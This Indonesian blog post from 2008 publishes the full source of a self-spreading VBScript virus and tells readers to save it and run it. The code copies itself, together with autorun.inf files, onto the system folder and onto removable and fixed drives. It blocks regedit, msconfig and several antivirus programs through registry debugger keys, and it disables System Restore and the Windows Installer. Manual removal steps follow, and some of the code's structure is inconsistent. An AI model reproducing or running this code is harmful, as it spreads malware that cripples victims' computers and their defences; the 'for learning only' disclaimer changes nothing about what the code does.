Sobat Muda

Pengumuman

Diperbolehkan bagi temen-temen untuk mengutip seluruh isi artikel di dalam situs ini untuk tujuan kebaikan dan WAJIB untuk mencantumkan NAMA PENULIS dan SUMBERNYA.
Bagi yang mengisi comment ataupun guestbook, diharuskan mencantumkan nama dan identitas. Jika tidak maka comment kamu akan saya delete tanpa konfirmasi.
Bagi yang mengisi comment ataupun guestbook, cukup mengisi sekali saja. Karena setiap comment harus dimoderasi, jadi nggak ditampilkan terlebih dahulu.
Buat teman-teman yang ingin buat blog sendiri, kami juga menawarkan Hosting Gratis. So, buat yang pengen apply, silahkan pelajari lebih lanjut dengan membuka menu : Hosting Gratis pada menu di atas/

Mutiara 'Ilmu

Dari Asad, dia berkata: "Jika Syadad bin Aus akan merebahkan tubuhnya diatas pembaringan, maka tingkahnya seperti sebutir biji yang diletakkan diatas wajan penggorengan. Dia berkata: 'Ya Allah, seseungguhnya bayangan neraka membuatku susah tidur.' Akhirnya ia kembali bangkit dari tempat tidur untuk kemudian mengerjakan shalat sunnah." (Shifatush Shafwah I/709)

Script Virus *vbs (1)

Written by Andita SB

Wednesday, 09 April 2008

Ya..

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\vhck3d.vbs")

Tf.attributes = 39

Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

'Banyak yang dirubah..liat ndiri deh aaah

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer

2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada

3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive

4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs

5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.

(thanks to Galang, junior hacker and vixer ^_^. Yang telah mengembangkan virus ini dengan cukup baik...)

Comments

Add New

anggie - mhs

|221.132.224.xxx |2008-05-16 10:30:48

lumayan....!!!

Display Options

Text Size

Sidebar Postion

Layout

Color Options

Display Options Help

Pengumuman

Mutiara 'Ilmu

3.26 Copyright (C) 2008 Compojoom.com / Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Main Menu

Islam

Dunia Muda

Jendela Keluarga

Kolom Nisaa

Serba-Serbi

Teknologi

Pengunjung

SEO

Banner